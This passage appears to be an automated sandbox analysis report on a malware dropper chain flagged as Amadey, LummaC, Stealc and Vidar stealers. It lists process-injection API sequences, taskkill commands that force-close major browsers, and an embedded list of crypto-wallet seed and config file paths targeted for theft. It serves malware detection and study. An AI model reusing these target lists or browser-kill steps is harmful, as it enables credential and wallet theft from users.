Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0040CDA3
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0040A6E0 SetUnhandledExceptionFilter,	20_2_0040A6E0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_10002ADF
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_100056A0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_10002FDA
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B39C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_04B39C51
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_04B3A7B1
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_04B3D00A
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3A947 SetUnhandledExceptionFilter,	20_2_04B3A947

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Code function: 15_2_00B2E1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

15_2_00B2E1A9

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Memory written: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe base: 5A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Memory written: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory written: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe base: 900000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Memory written: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Memory written: C:\Users\user\AppData\Local\Temp\vmwin.exe base: 580000 value starts with: 4D5A

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	17_2_004152A5
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00815468 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	17_2_00815468
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0081550C CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	17_2_0081550C

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe "C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe "C:\Users\user~1\AppData\Local\Temp\1014880001\8f25543307.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe "C:\Users\user~1\AppData\Local\Temp\1014881001\a629a70424.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe "C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe "C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\vmwin.exe "C:\Users\user\AppData\Local\Temp\vmwin.exe"
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: 75e257f622.exe, 0000001E.00000000.2414080212.00000000008B2000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 8f25543307.exe	Binary or memory string: hgProgram Manager
Source: file.exe, 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: oOzwMProgram Manager
Source: file.exe, file.exe, 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: OzwMProgram Manager
Source: 8f25543307.exe, 00000014.00000002.3183424876.00000000009A1000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: hgProgram Manager
Source: firefox.exe, 0000002C.00000002.2667422444.000000F96A3FB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe

Code function: 20_3_04CF96AC cpuid

20_3_04CF96AC

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

17_2_0081413E

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014884001\9ffcf1ab77.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014884001\9ffcf1ab77.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014886001\994907c116.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014886001\994907c116.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\vmwin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00E1CBEA

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: 17_2_00413D91 GetProcessHeap,HeapAlloc,GetUserNameA,

17_2_00413D91

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: 17_2_008140BB GetProcessHeap,GetTimeZoneInformation,

17_2_008140BB

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 14.2.BlueMail.exe.4583270.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Gxtuum.exe.391f290.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.BlueMail.exe.4583270.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.BlueMail.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Gxtuum.exe.391f290.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2789644908.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2324029799.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.skotes.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 75e257f622.exe PID: 4248, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000002D.00000003.2522812356.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.3208807770.00000000003C1000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.3211612383.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: c2bea0d661.exe PID: 4876, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: Electrum
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: \Electrum\wallets\
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia 